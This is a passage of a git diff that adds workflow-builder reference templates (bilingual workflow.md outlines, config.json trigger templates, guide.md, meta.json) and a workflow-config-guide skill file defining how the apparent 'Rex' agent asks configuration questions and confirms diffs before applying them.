+创建工作流时，先用 `Question` 工具确认用户需要哪种语言，然后读取对应模板，把真实内容写入工作流目录下唯一的 `workflow.md`。
diff --git a/.flocks/plugins/skills/workflow-builder/references/composition.md b/.flocks/plugins/skills/workflow-builder/references/composition.md
index 038bd082b..79ffea1b9 100644
--- a/.flocks/plugins/skills/workflow-builder/references/composition.md
+++ b/.flocks/plugins/skills/workflow-builder/references/composition.md
@@ -18,6 +18,10 @@
 {
   "format": "flocks-workflow-composition-v1",
   "name": "your_workflow_name",
+  "nameI18n": {
+    "zh-CN": "你的工作流名称",
+    "en-US": "Your Workflow Name"
+  },
   "start": "node_id",
   "nodes": [
     {
diff --git a/.flocks/plugins/skills/workflow-builder/references/reference.md b/.flocks/plugins/skills/workflow-builder/references/reference.md
index 8b91d161e..2fa7458aa 100644
--- a/.flocks/plugins/skills/workflow-builder/references/reference.md
+++ b/.flocks/plugins/skills/workflow-builder/references/reference.md
@@ -195,6 +195,10 @@
 ```json
 {
   "name": "my_workflow",
+  "nameI18n": {
+    "zh-CN": "我的工作流",
+    "en-US": "My Workflow"
+  },
   "description": "工作流用途说明（可选）",
   "start": "step_1",
   "nodes": [
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_en.md b/.flocks/plugins/skills/workflow-builder/references/workflow_en.md
new file mode 100644
index 000000000..18b9d666d
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_en.md
@@ -0,0 +1,189 @@
+# [workflow_id]
+
+> This is an English `workflow.md` structure template. When creating a workflow, replace placeholders with real business content and write only the final result to `workflow.md` in the workflow directory.
+
+## 1. Functional Overview
+
+`[workflow_id]` is a [one-sentence description of the workflow type].
+
+It mainly does three things:
+
+- [Goal 1: what information the workflow receives or organizes.]
+- [Goal 2: how it processes, decides, filters, aggregates, or analyzes.]
+- [Goal 3: what it outputs and who uses the result.]
+
+Suitable scenarios:
+
+- [Scenario 1]
+- [Scenario 2]
+- [Scenario 3]
+
+Out of scope:
+
+- [Boundary 1]
+- [Boundary 2]
+- Do not store plaintext secrets. Credentials, enable/disable state, and runtime configuration should be managed by configuration and storage.
+
+## 2. Flow Map
+
+The workflow runs in this order:
+
+```text
+[node_1] -> [node_2] -> [node_3] -> [final_node]
+```
+
+| Order | Node | Responsibility |
+| --- | --- | --- |
+| 1 | `[node_1]` | [Node responsibility] |
+| 2 | `[node_2]` | [Node responsibility] |
+| 3 | `[node_3]` | [Node responsibility] |
+
+In plain terms:
+
+```text
+Raw input
+  -> [first processing step]
+  -> [second processing step]
+  -> [third processing step]
+  -> final output
+```
+
+## 3. Inputs
+
+### 3.1 Input Modes
+
+| Priority | Field | Type | Purpose |
+| --- | --- | --- | --- |
+| 1 | `[primary_input]` | `[type]` | [Primary input source] |
+| 2 | `[secondary_input]` | `[type]` | [Optional input source] |
+
+If multiple input fields are provided, the workflow should process `[primary_input]` first.
+
+### 3.2 Common Parameters
+
+| Parameter | Default | Description |
+| --- | --- | --- |
+| `[param_name]` | `[default]` | [Meaning] |
+
+### 3.3 Input Example
+
+```json
+{
+  "input": "replace with a representative sample"
+}
+```
+
+## 4. Module Logic
+
+### 4.1 [node_1]: [Node Name]
+
+This node answers:
+
+- [Question 1]
+- [Question 2]
+
+Processing logic:
+
+1. [Step 1]
+2. [Step 2]
+3. [Step 3]
+
+Tool/model:
+
+- Type: Tool-driven / LLM-driven / Python rule
+- Call: [tool name or model purpose; write none if not used]
+
+Inputs:
+
+| Field | Source | Description |
+| --- | --- | --- |
+| `[field]` | `[source]` | [Description] |
+
+Outputs:
+
+| Field | Description |
+| --- | --- |
+| `[output_field]` | [Description] |
+
+Typical edit points:
+
+- [Common edit point 1]
+- [Common edit point 2]
+
+### 4.2 [node_2]: [Node Name]
+
+Describe every node with the same structure. The node descriptions must be clear enough for Flocks to generate a stable `workflow.json` from this document.
+
+## 5. Outputs
+
+The workflow mainly outputs these fields:
+
+| Field | Type | Meaning |
+| --- | --- | --- |
+| `[result]` | object | [Final result] |
+| `[summary]` | string | [Summary] |
+
+If the workflow writes files, write them under:
+
+```text
+~/.flocks/workspace/outputs/<YYYY-MM-DD>/
+```
+
+Do not write reports, debug files, or intermediate artifacts into the project code directory.
+
+## 6. Publishing And Configuration
+
+The publish page does not decide capabilities directly from `workflow.md`; it reads the `config.json` template and runtime state from storage.
+
+Supported publishing or integration modes:
+
+- API: [supported or not; path or purpose]
+- Syslog: [supported or not; port, protocol, start/stop behavior]
+- Kafka: [supported or not; topic, consumer group, start/stop behavior]
+- Webhook: [supported or not; callback or ingestion behavior]
+- Schedule: [supported or not; trigger cadence]
+
+When editing publishing modes:
+
+- Change the publish template in `config.json`.
+- Change runtime start/stop state through the publish page and backend runtime state.
+- Do not write plaintext API keys, passwords, or tokens into `workflow.md` or `config.json`.
+
+## 7. How To Edit This Workflow
+
+Use the target change to locate the right area:
+
+| Change target | Edit first |
+| --- | --- |
+| Input fields or entry modes | `[entry_node]` |
+| Field mapping or normalization | `[normalize_node]` |
+| Decision, filtering, aggregation, or analysis rules | `[logic_node]` |
+| Output fields or file format | `[output_node]` |
+| Publishing and integration configuration | `config.json` |
+| Flow structure, added nodes, or removed nodes | `workflow.md`, then regenerate `workflow.json` after confirmation |
+
+Basic editing principles:
+
+- If you change input fields, update the sample input.
+- If you rename standard fields, update every downstream node.
+- If you change decision rules, update output descriptions and validation samples.
+- If you change output format, confirm downstream systems can still read it.
+
+## 8. Validation
+
+Minimum validation:
+
+1. Run one normal input and confirm the main output fields are non-empty.
+2. Run one edge-case input and confirm error handling behaves as expected.
+3. If there are branches, validate each important branch at least once.
+4. If files are written, check the output path and file content.
+5. If there is publish configuration, confirm the publish page only shows enabled capabilities.
+
+Acceptance checklist:
+
+- [ ] Inputs are correctly recognized and parsed.
+- [ ] Each node has a clear responsibility and outputs fields downstream nodes can read.
+- [ ] Branch, filtering, aggregation, or analysis logic matches expectations.
+- [ ] Output fields and file formats are clear.
+- [ ] `workflow.md` and `workflow.json` describe the same flow.
+- [ ] No plaintext secrets are written into the workflow directory.
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_template/config.json b/.flocks/plugins/skills/workflow-builder/references/workflow_template/config.json
new file mode 100644
index 000000000..c6dcb80df
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_template/config.json
@@ -0,0 +1,126 @@
+{
+  "version": 1,
+  "kind": "workflow.integration-config",
+  "workflow": {
+    "id": null,
+    "name": "<workflow_name>",
+    "source": "project"
+  },
+  "updatedAt": 0,
+  "publish": {
+    "type": "api_service",
+    "enabled": false,
+    "status": "stopped",
+    "driver": "local",
+    "apiKeyConfigured": false,
+    "allowedActions": [
+      "publish",
+      "stop",
+      "copyInvokeUrl",
+      "rotateApiKey"
+    ]
+  },
+  "triggers": [
+    {
+      "id": "syslog-default",
+      "type": "syslog",
+      "name": "Syslog Listener",
+      "enabled": false,
+      "status": "stopped",
+      "source": {
+        "host": "0.0.0.0",
+        "port": 1514,
+        "protocol": "udp",
+        "format": "auto"
+      },
+      "mapping": {
+        "syslog_message": "$.body"
+      },
+      "inputs": {},
+      "allowedActions": [
+        "start",
+        "stop"
+      ]
+    },
+    {
+      "id": "kafka-default",
+      "type": "kafka",
+      "name": "Kafka Consumer",
+      "enabled": false,
+      "status": "stopped",
+      "source": {
+        "inputBroker": "localhost:9092",
+        "inputTopic": "<topic>",
+        "inputGroupId": "<workflow_id>-group",
+        "autoOffsetReset": "latest"
+      },
+      "mapping": {
+        "kafka_message": "$.body"
+      },
+      "inputs": {},
+      "allowedActions": [
+        "start",
+        "stop"
+      ]
+    },
+    {
+      "id": "schedule-default",
+      "type": "schedule",
+      "name": "Cron Schedule",
+      "enabled": false,
+      "status": "stopped",
+      "source": {
+        "mode": "cron",
+        "cron": "*/5 * * * *",
+        "intervalSeconds": 300,
+        "timezone": "Asia/Shanghai"
+      },
+      "runtime": {
+        "timeoutSeconds": 7200,
+        "noOverlap": true
+      },
+      "inputs": {
+        "trigger": "schedule"
+      },
+      "allowedActions": [
+        "start",
+        "stop"
+      ]
+    },
+    {
+      "id": "webhook-default",
+      "type": "custom_webhook",
+      "name": "Webhook Trigger",
+      "enabled": false,
+      "status": "stopped",
+      "source": {
+        "method": "POST",
+        "path": "/workflows/<workflow_id>/hook"
+      },
+      "auth": {
+        "type": "api_key",
+        "apiKeyConfigured": false,
+        "headerName": "x-api-key"
+      },
+      "mapping": {
+        "event": "$.body"
+      },
+      "inputs": {},
+      "allowedActions": [
+        "enable",
+        "disable",
+        "copyWebhookUrl"
+      ]
+    }
+  ],
+  "rendering": {
+    "rule": "The publish page renders only configured publish and trigger modes.",
+    "hideUnconfiguredModes": true,
+    "secretsPolicy": "Do not store plaintext secrets; store secret references or configured booleans."
+  },
+  "referenceNotes": {
+    "templateOnly": true,
+    "usage": "Copy only the publish mode and trigger entries needed by the real workflow. Remove unused trigger examples before saving the workflow config.",
+    "runtimePolicy": "This file is a desired capability template. Publishing, unpublishing, and trigger start or stop actions must call runtime APIs instead of editing config.json."
+  }
+}
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_template/guide.md b/.flocks/plugins/skills/workflow-builder/references/workflow_template/guide.md
new file mode 100644
index 000000000..1ca7c7e09
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_template/guide.md
@@ -0,0 +1,115 @@
+# workflow_template 配置引导参考
+
+这个文件是 `workflow-builder` skill 内部的 `guide.md` 参考模板，用于创建真实工作流时改写成该工作流自己的配置引导文件。
+
+真实工作流被配置时，Rex 必须读取真实工作流目录下的 `guide.md`，而不是把本参考模板当成工作流细节来源。
+
+`workflow-config-guide` skill 只提供交互协议；本文件才是工作流配置细节、默认选项和验证方式的来源。
+
+## 1. 工作流定位
+
+- 工作流 ID：`workflow_template`
+- 适用场景：模板占位工作流，用于复制后改造成真实工作流。
+- 当前状态：隐藏模板，不应在普通 UI 中作为可运行工作流展示。
+
+## 2. AI 引导方式
+
+真实工作流的 `guide.md` 不需要描述 UI 快捷入口。快捷入口只是用户意图来源，Rex 应该：
+
+1. 读取真实工作流的 `guide.md` 全文。
+2. 根据用户点击的入口或自然语言需求，自动定位相关章节。
+3. 提取该章节里的默认值、约束、样例、验证方法和禁止事项。
+4. 用 question 工具一次只问一个最关键问题。
+5. 必须提供自定义/补充输入；没有则填 `none`。
+
+## 3. 输入模式
+
+创建真实工作流的 `guide.md` 时，请把这里改成真实入口。
+
+建议写清楚：
+
+- 支持哪些入口：API、Syslog、Kafka、Webhook、Schedule、File、Manual test。
+- 每种入口对应的 `config.json`/Storage 模板字段。
+- 哪些入口互斥，哪些可以同时存在。
+- 默认推荐哪个入口，以及原因。
+
+Rex 提问要求：
+
+- 一次只问一个输入模式问题。
+- 必须提供自定义/补充输入；没有则填 `none`。
+- 如果输入模式会改变发布模板，先展示 diff，再用 question 工具确认。
+
+## 4. 来源形态
+
+创建真实工作流的 `guide.md` 时，请描述真实来源。
+
+建议写清楚：
+
+- 来源产品或系统名称。
+- payload 是对象、列表、文件路径、文本消息还是其它格式。
+- 必填字段、可选字段和默认值。
+- 字段映射由哪个节点处理。
+- 是否已有代表性样例。
+
+## 5. 输出去向
+
+创建真实工作流的 `guide.md` 时，请描述真实输出。
+
+建议写清楚：
+
+- API 返回字段。
+- 文件落盘路径。
+- Kafka/IM/channel/下游工作流等外发方式。
+- 输出失败或空结果时的行为。
+
+## 6. 处理规则
+
+创建真实工作流的 `guide.md` 时，请描述用户最常改的业务规则。
+
+建议写清楚：
+
+- 过滤条件。
+- 阈值。
+- 去重或聚合策略。
+- 开关项。
+- 哪些低层参数默认隐藏，不主动询问。
+
+## 7. 样例验证
+
+创建真实工作流的 `guide.md` 时，请放入一条最小可用样例，或说明用户应该粘贴什么格式。
+
+Rex 验证时应优先做轻量检查：
+
+- JSON/文本格式是否正确。
+- 字段映射是否能进入入口节点。
+- 预期输出是否符合 `workflow.md`。
+- 不要启用外部副作用，除非用户明确确认。
+
+## 8. 应用方式
+
+发布配置模板的生效来源：
+
+- 优先读后端 Storage/SQL 的 `/api/workflow/<id>/config`。
+- 如果库里没有，调用 `/api/workflow/<id>/config/sync`，由后端读取工作流目录下的 `config.json` 并迁移到 Storage/SQL。
+- `config.json` 是导入/兜底模板，不是运行态开关。
+- 不要直接写 `config.json` 来表示发布、接入或触发配置已经生效。
+- 启停、发布、取消发布等运行态动作必须调用运行时接口，不要通过修改 `config.json` 完成。
+- 如果后端配置接口不可用，只能把目标配置保存为草稿到 outputs，并明确说明未应用、未发布、未启动。
+
+应用变更前：
+
+- 展示计划。
+- 展示 diff。
+- 用 question 工具确认应用、保存草稿或暂不修改。
+
+## 9. 查配置
+
+只读检查顺序：
+
+1. 读取本文件。
+2. 读取 `workflow.md` 和 `workflow.json`。
+3. 查询 `/api/workflow/<id>/config`。
+4. 必要时查看 `config.json` 是否只是兜底模板。
+5. 汇总已配置项、缺失项和最推荐下一步。
+
+查配置不得修改文件或运行态。
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_template/meta.json b/.flocks/plugins/skills/workflow-builder/references/workflow_template/meta.json
new file mode 100644
index 000000000..a51696a87
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_template/meta.json
@@ -0,0 +1,19 @@
+{
+  "id": "workflow_template",
+  "name": "Workflow Builder Reference Template",
+  "nameI18n": {
+    "zh-CN": "工作流创建参考模板",
+    "en-US": "Workflow Builder Reference Template"
+  },
+  "description": "Internal workflow-builder reference package for workflow.md, workflow.json, config.json, and guide.md authoring.",
+  "category": "template",
+  "status": "hidden",
+  "hidden": true,
+  "templateOnly": true,
+  "visibility": "hidden",
+  "excludeFromUI": true,
+  "excludeFromPrompt": true,
+  "createdBy": null,
+  "createdAt": 0,
+  "updatedAt": 0
+}
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.json b/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.json
new file mode 100644
index 000000000..92694e7e0
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.json
@@ -0,0 +1,39 @@
+{
+  "id": "workflow_template",
+  "name": "workflow_template",
+  "nameI18n": {
+    "zh-CN": "工作流模板",
+    "en-US": "Workflow Template"
+  },
+  "description": "Hidden template for workflow.json, workflow.md, and config.json.",
+  "start": "template_entry",
+  "nodes": [
+    {
+      "id": "template_entry",
+      "type": "python",
+      "description": "Template placeholder. Copy this directory and replace the workflow before use.",
+      "code": "outputs['templateOnly'] = True\noutputs['message'] = 'Hidden workflow template; copy before use.'"
+    }
+  ],
+  "edges": [],
+  "metadata": {
+    "hidden": true,
+    "templateOnly": true,
+    "visibility": "hidden",
+    "excludeFromUI": true,
+    "excludeFromPrompt": true,
+    "templateVersion": 1,
+    "requiredFiles": [
+      "workflow.json",
+      "workflow.md",
+      "config.json",
+      "meta.json"
+    ],
+    "publishConfigContract": {
+      "api": "When config.publish.type is api_service, the publish page shows only API publish controls.",
+      "syslog": "When config.triggers only contains syslog, the publish page shows only syslog listener start/stop controls.",
+      "kafka": "When config.triggers only contains kafka, the publish page shows only kafka consumer start/stop controls.",
+      "schedule": "When config.triggers only contains schedule, the publish page shows only schedule start/stop controls."
+    }
+  }
+}
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.md b/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.md
new file mode 100644
index 000000000..5cb9fb87d
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.md
@@ -0,0 +1,117 @@
+# workflow_template
+
+> `workflow.md` is the single human-editable workflow specification. Flocks uses this file to understand intent, then keeps `workflow.json` aligned with the executable graph.
+
+## 1. Workflow Card
+
+- Workflow ID: `workflow_template`
+- Reference directory: `.flocks/plugins/skills/workflow-builder/references/workflow_template/`
+- Category: `template`
+- Status: skill reference template, not a scannable workflow
+- Entry node: `template_entry`
+- Terminal node: `template_entry`
+
+## 2. Business Goal
+
+Describe the operational problem this workflow solves, who will use it, and what a successful run produces.
+
+Success criteria:
+
+- [ ] The expected input shape is clear.
+- [ ] Each module has an explicit responsibility.
+- [ ] The final output contract is clear to humans and downstream systems.
+- [ ] Failure and empty-input behavior are documented.
+
+## 3. Runtime Contract
+
+### Inputs
+
+Replace this section with the real input keys and shapes.
+
+| Field | Type | Required | Default | Description |
+| --- | --- | --- | --- | --- |
+| `input` | object | yes | - | Primary workflow input. |
+
+### Outputs
+
+Replace this section with the final output contract.
+
+| Field | Type | Description |
+| --- | --- | --- |
+| `result` | object | Final workflow result. |
+
+### Tunables
+
+List thresholds, switches, timeouts, file paths, concurrency settings, and rollback notes.
+
+## 4. Flow Map
+
+`template_entry`
+
+| Order | Node | Type | Responsibility | Next |
+| --- | --- | --- | --- | --- |
+| 1 | `template_entry` | Python | Placeholder entry node. Replace before use. | final output |
+
+## 5. Module Specs
+
+### 1. template_entry
+
+| Item | Content |
+| --- | --- |
+| Module type | Python |
+| Responsibility | Placeholder node that marks this directory as a template. |
+| Inputs | Workflow inputs |
+| Outputs | `templateOnly`, `message` |
+| Edit focus | Replace this node with the real first module. |
+
+Generation notes for Flocks:
+
+- Keep node IDs stable after users start configuring publish modes.
+- When adding or renaming outputs, update downstream edges and the runtime contract.
+- Do not store plaintext secrets in this directory.
+
+## 6. Data Flow And Field Contract
+
+Document every cross-module field that must remain stable.
+
+- `template_entry -> final output`
+
+## 7. Publish And Triggers
+
+The publish page reads `config.json` as a template and reads runtime state from storage.
+
+- If `publish.type` is `api_service`, show API publish controls.
+- If only `syslog` is configured, show only syslog listener start/stop controls.
+- If only `kafka` is configured, show only kafka consumer start/stop controls.
+- If only `schedule` is configured, show only schedule start/stop controls.
+- Store secret references or configured booleans only; never store plaintext secrets.
+
+Workflow configuration guidance lives in `guide.md`.
+
+- `workflow-config-guide` defines interaction rules only.
+- A real workflow's own `guide.md` defines that workflow's actual configuration questions, defaults, samples, and validation steps.
+- Workflow chat shortcut buttons must read the real workflow's `guide.md` before asking or applying any configuration step.
+
+## 8. Change Guide
+
+| Change type | Edit first | Also check |
+| --- | --- | --- |
+| Input shape | Runtime Contract | Entry module, sample inputs |
+| Module logic | Module Specs | Upstream outputs, downstream inputs |
+| Output shape | Runtime Contract | Terminal module, downstream consumers |
+| Publish mode | Publish And Triggers / `config.json` | Auth, secret refs, runtime state |
+
+## 9. Flocks Generation Constraints
+
+- `workflow.md` describes intent, module boundaries, field contracts, and validation.
+- `workflow.json` describes executable nodes, edges, code, triggers, and metadata.
+- Regeneration should preserve node IDs unless the user explicitly requests a graph change.
+- Deleting or renaming a node requires updating edges, mappings, samples, and tests.
+
+## 10. Validation Checklist
+
+- [ ] `workflow.md` and `workflow.json` describe the same flow.
+- [ ] A representative sample input runs successfully.
+- [ ] At least one edge or error case is documented.
+- [ ] Publish page only shows capabilities enabled by `config.json`.
+- [ ] No plaintext secrets are stored in the workflow directory.
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_zh.md b/.flocks/plugins/skills/workflow-builder/references/workflow_zh.md
new file mode 100644
index 000000000..5adb56027
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_zh.md
@@ -0,0 +1,189 @@
+# [workflow_id]
+
+> 这是一份中文 `workflow.md` 结构模板。创建工作流时，把占位内容替换成真实业务内容，并只把最终内容写入工作流目录下的 `workflow.md`。
+
+## 1. 功能概述
+
+`[workflow_id]` 是一个 [一句话说明工作流类型]。
+
+它主要解决三件事：
+
+- [目标 1：这个工作流接收或整理什么信息。]
+- [目标 2：它如何处理、判断、过滤、聚合或分析。]
+- [目标 3：它最终输出什么结果，给谁使用。]
+
+适用场景：
+
+- [场景 1]
+- [场景 2]
+- [场景 3]
+
+不适合做的事：
+
+- [边界 1]
+- [边界 2]
+- 不保存明文密钥；凭证、启停状态和运行时配置应由配置和数据库管理。
+
+## 2. 总体流程
+
+工作流按下面顺序处理：
+
+```text
+[node_1] -> [node_2] -> [node_3] -> [final_node]
+```
+
+| 顺序 | 节点 | 作用 |
+| --- | --- | --- |
+| 1 | `[node_1]` | [节点职责] |
+| 2 | `[node_2]` | [节点职责] |
+| 3 | `[node_3]` | [节点职责] |
+
+可以把它理解成：
+
+```text
+原始输入
+  -> [第一步处理]
+  -> [第二步处理]
+  -> [第三步处理]
+  -> 最终输出
+```
+
+## 3. 输入说明
+
+### 3.1 输入方式
+
+| 优先级 | 字段 | 类型 | 用途 |
+| --- | --- | --- | --- |
+| 1 | `[primary_input]` | `[type]` | [主要输入来源] |
+| 2 | `[secondary_input]` | `[type]` | [可选输入来源] |
+
+如果同时传入多个输入字段，工作流优先处理 `[primary_input]`。
+
+### 3.2 常用输入参数
+
+| 参数 | 默认值 | 说明 |
+| --- | --- | --- |
+| `[param_name]` | `[default]` | [参数含义] |
+
+### 3.3 输入示例
+
+```json
+{
+  "input": "replace with a representative sample"
+}
+```
+
+## 4. 模块逻辑
+
+### 4.1 [node_1]：[节点名称]
+
+这个节点负责回答：
+
+- [问题 1]
+- [问题 2]
+
+处理逻辑：
+
+1. [步骤 1]
+2. [步骤 2]
+3. [步骤 3]
+
+工具/模型：
+
+- 类型：Tool-driven / LLM-driven / Python rule
+- 调用：[工具名或模型用途；没有则写无]
+
+输入：
+
+| 字段 | 来源 | 说明 |
+| --- | --- | --- |
+| `[field]` | `[source]` | [说明] |
+
+输出：
+
+| 字段 | 说明 |
+| --- | --- |
+| `[output_field]` | [说明] |
+
+你通常会在这里修改：
+
+- [常见修改点 1]
+- [常见修改点 2]
+
+### 4.2 [node_2]：[节点名称]
+
+按同样结构描述每个节点。节点描述必须能让 Flocks 根据本文档稳定生成 `workflow.json`。
+
+## 5. 输出说明
+
+工作流主要输出这些字段：
+
+| 字段 | 类型 | 含义 |
+| --- | --- | --- |
+| `[result]` | object | [最终结果] |
+| `[summary]` | string | [摘要] |
+
+如果工作流会写文件，文件应写入：
+
+```text
+~/.flocks/workspace/outputs/<YYYY-MM-DD>/
+```
+
+不要把报告、调试文件或中间产物写到项目代码目录。
+
+## 6. 发布和配置
+
+发布页面不直接从 `workflow.md` 决定展示什么能力，而是读取 `config.json` 模板和数据库中的运行时状态。
+
+当前可配置的接入或发布方式：
+
+- API：[是否支持；路径或用途]
+- Syslog：[是否支持；端口、协议、启停说明]
+- Kafka：[是否支持；topic、consumer group、启停说明]
+- Webhook：[是否支持；回调或接入说明]
+- Schedule：[是否支持；触发周期说明]
+
+编辑发布方式时：
+
+- 改发布模板：看 `config.json`。
+- 改运行启停状态：看发布页和后端运行时状态。
+- 不要把明文 API Key、密码、token 写进 `workflow.md` 或 `config.json`。
+
+## 7. 怎么编辑这个工作流
+
+按你想改的目标定位：
+
+| 修改目标 | 优先修改 |
+| --- | --- |
+| 输入字段或入口方式 | `[entry_node]` |
+| 字段映射或标准化 | `[normalize_node]` |
+| 判断、过滤、聚合、分析规则 | `[logic_node]` |
+| 输出字段或文件格式 | `[output_node]` |
+| 发布方式和接入配置 | `config.json` |
+| 流程结构、节点增删 | `workflow.md`，确认后再生成 `workflow.json` |
+
+修改时的基本原则：
+
+- 改输入字段，要同步样例输入。
+- 改标准字段名，要同步所有下游节点。
+- 改判断规则，要同步输出说明和验证样例。
+- 改输出格式，要确认下游系统还能读取。
+
+## 8. 验证方式
+
+最小验证建议：
+
+1. 用一条正常输入跑通，确认主要输出字段非空。
+2. 用一条边界输入确认异常处理符合预期。
+3. 如果有分支，至少验证每个关键分支一次。
+4. 如果写文件，检查输出路径和文件内容。
+5. 如果有发布配置，确认发布页只展示当前配置启用的能力。
+
+验收清单：
+
+- [ ] 输入能被正确识别和解析。
+- [ ] 每个节点的职责清晰且输出可被下游读取。
+- [ ] 分支、过滤、聚合或分析逻辑符合预期。
+- [ ] 输出字段和文件格式清晰。
+- [ ] `workflow.md` 和 `workflow.json` 描述同一个流程。
+- [ ] 没有明文密钥写入工作流目录。
diff --git a/.flocks/plugins/skills/workflow-config-guide/SKILL.md b/.flocks/plugins/skills/workflow-config-guide/SKILL.md
new file mode 100644
index 000000000..20970988c
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-config-guide/SKILL.md
@@ -0,0 +1,164 @@
+---
+name: workflow-config-guide
+category: system
+ui_hidden: true
+description: 配置现有 Flocks 工作流的发布、集成、触发器和发布配置模板；本 skill 只定义交互协议，具体配置问题必须来自工作流目录内的 guide.md
+---
+
+# Workflow Config Guide
+
+Use this skill when the user asks to configure, publish, integrate, deploy, or validate an existing Flocks workflow, especially when the task involves publish configuration templates, `config.json` import/fallback, API publishing, Syslog/Kafka/Webhook/Schedule triggers, file input, downstream output, sample validation, or a first-time deployment guide.
+
+This skill is a protocol layer only. It must not be used as the source of workflow-specific configuration questions or defaults. For every existing workflow, the source of truth for configuration details is the workflow-local `guide.md` file in the same directory as `workflow.md`, `workflow.json`, and optional `config.json`.
+
+Do not use this skill to create a brand-new workflow from scratch. Use `workflow-builder` for workflow design and generation, then return to this skill when the workflow already exists and needs runtime configuration.
+
+## Quick Start
+
+1. Identify the current workflow directory. Prefer the explicit path in the user request; otherwise inspect the active workflow context and project/user workflow roots.
+2. Read the workflow-local `guide.md` first. If it is missing or too thin to answer the user's request, stop and use the `question` tool to ask whether to generate or repair `guide.md` from `workflow.md`, `workflow.json`, and `config.json`.
+3. Read the workflow files that exist: `workflow.json`, `workflow.md`, optional legacy `config.json`, and `meta.json`. Treat the backend `/api/workflow/<workflow_id>/config` response as the canonical publish template. If no stored template exists, use `/api/workflow/<workflow_id>/config/sync` to let the backend migrate the fallback `config.json`.
+4. Summarize the current configurable capabilities in plain language, using `guide.md` as the source for workflow-specific modes, defaults, sample requirements, validation, and recommended question order.
+5. When any user decision, missing value, preference, or confirmation is needed, call the `question` tool. Do not ask configuration questions in ordinary assistant text.
+6. Before changing the publish template, show a unified diff against the canonical backend config, then call the `question` tool for explicit confirmation. That single approval authorizes applying the shown diff through the backend config endpoint; do not ask a second "should I call PUT" question for the same diff.
+7. After applying changes, validate JSON syntax and run the lightest useful workflow/config smoke test available.
+8. End with a concise report in chat and save a timestamped report under `~/.flocks/workspace/outputs/<today>/`, computing `<today>` at execution time.
+
+## Workflow-local Guide Contract
+
+Each workflow that can be configured by Rex should include:
+
+```text
+<workflow_dir>/
+  workflow.md
+  workflow.json
+  config.json        # optional import/fallback publish template
+  guide.md           # workflow-specific configuration guide
+```
+
+`guide.md` must answer these questions for this workflow, in the workflow's own domain language:
+
+- What problem the workflow solves and which runtime paths are supported.
+- What information must be collected from the user before configuration can be applied.
+- Recommended defaults and safe fallback behavior.
+- Which values are runtime state in Storage/SQL rather than editable template fields.
+- Sample input requirements and the lightest validation method.
+
+`guide.md` should not contain a UI button table. If a user clicks a guide shortcut, treat the shortcut label as an intent hint, read `guide.md`, semantically extract the relevant guidance, defaults, constraints, examples, and validation rules, then ask the single next useful question with the `question` tool. If no relevant guidance exists, say that the workflow guide is missing that detail and ask whether to repair `guide.md`.
+
+## Configuration Contract
+
+Treat the publish configuration template as a workflow runtime/publish template, not as a second copy of workflow code. The canonical template is stored in Storage/SQL under the backend workflow config endpoint. A workflow-local `config.json` is only an import/fallback artifact: when the backend has no stored template, it may read `config.json` once and migrate that content into Storage/SQL.
+
+- If the stored template declares only API publishing, the publish page should expose only API publish controls.
+- If the stored template declares only one trigger type (Syslog, Kafka, Webhook, or Schedule), the publish page should expose only that trigger's start/stop or enable/disable controls.
+- Do not store plaintext secrets in the template; store booleans such as `apiKeyConfigured` or secret-manager references.
+- Never edit workflow-local `config.json` to apply a publish, input, or trigger configuration. It is a fallback import template only.
+- Treat the template as display/intent only. Real enabled/running/stopped state must come from runtime APIs backed by Storage/SQL, never from editing a template file directly.
+- Do not modify workflow node code while applying runtime configuration unless the user explicitly asks for a code change.
+- Re-running with the same answers should be idempotent: no changes, or a small diff limited to comments/timestamps.
+
+## Conversation Pattern
+
+Guide the user from "I have this workflow" to "I know what is configured and what I still need to do".
+
+Ask decisions in the order specified by `guide.md`, using one `question` tool call per step. If `guide.md` has no order, use the clicked shortcut as the current step and ask only the single most relevant question for that shortcut. The generic categories below are only fallback headings for organizing a guide file, not universal workflow defaults:
+
+1. **Input mode**
+2. **Source system or data shape**
+3. **Output destinations**
+4. **Filtering or business defaults**
+5. **Validation sample**
+6. **Apply or draft**
+
+### Mandatory Question Tool Rule
+
+The `question` tool is mandatory for this skill. Any time you need the user to choose, confirm, approve a diff, provide a missing value, decide whether to change another file, or answer a follow-up, stop prose and call `question`.
+
+- Ordinary assistant text may summarize the current state, explain a proposed diff, or report results. It must not contain actionable questions such as "要不要...", "是否...", "请确认...", or numbered follow-ups like "第二个问题...".
+- If `question` is not available in the tool list, say that the configuration guide cannot continue interactively until the `question` tool is available. Do not fall back to inline chat questions.
+- Use one question card per turn. Do not ask several independent decisions in a single text paragraph.
+- For diff approval, show the diff first, then call `question` with choices such as "应用上面的 diff", "只保存草稿", and "暂不修改". If the user chooses to apply the shown diff, immediately apply it through the backend config endpoint; do not ask an extra confirmation that only repeats the same side effect.
+- For side-effect scope questions, such as "是否顺手修改 workflow.md", call `question`; do not ask in prose.
+
+Rule anchor: never make a configuration question choice-only.
+
+Never make a configuration question choice-only. Every Question-tool prompt used by this skill must include a way for the user to type a custom answer:
+
+- Prefer a `type: "text"` question when the answer may be a hostname, port, topic, path, payload shape, product name, or any value not safely covered by fixed options.
+- If you provide a `type: "choice"` question for recommended modes, also include a short `type: "text"` follow-up such as "Custom value or notes" with a placeholder that explains what the user can type. If the user has no custom value, allow them to enter "none".
+- Do not force the user into only API/Syslog/Kafka/Webhook/Schedule choices; custom integration modes, source products, output destinations, and deployment notes must be expressible in free text.
+
+Do not use the Question tool to collect long JSON, field lists, or credentials.
+
